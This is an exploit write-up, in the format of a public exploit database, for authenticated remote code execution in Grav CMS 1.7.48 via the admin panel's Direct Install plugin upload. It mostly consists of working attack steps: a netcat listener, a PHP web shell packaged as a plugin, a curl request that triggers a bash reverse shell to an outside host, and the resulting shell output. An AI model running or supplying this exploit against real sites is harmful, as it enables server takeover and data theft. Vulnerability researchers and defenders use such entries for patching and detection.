# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.
# Steps to Reproduce:
1. Start a listener on your attack machine:
nc -lvnp 4444
2. Log in to the Grav Admin Panel as an administrator:
https://<target>/admin
3. Navigate to:
Tools → Direct Install
4. Upload a ZIP archive containing the following structure:
evilplugin/
├── evilplugin.php # Contains: <?php shell_exec($_GET['cmd']); ?>
└── blueprints.yaml # Minimal content to pass plugin validation
5. Access the uploaded plugin’s endpoint and trigger the payload:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
6. Observe the reverse shell:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Successful exploitation may result in full system compromise.
# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286
# Disclaimer:
This exploit is provided for educational and research purposes only.
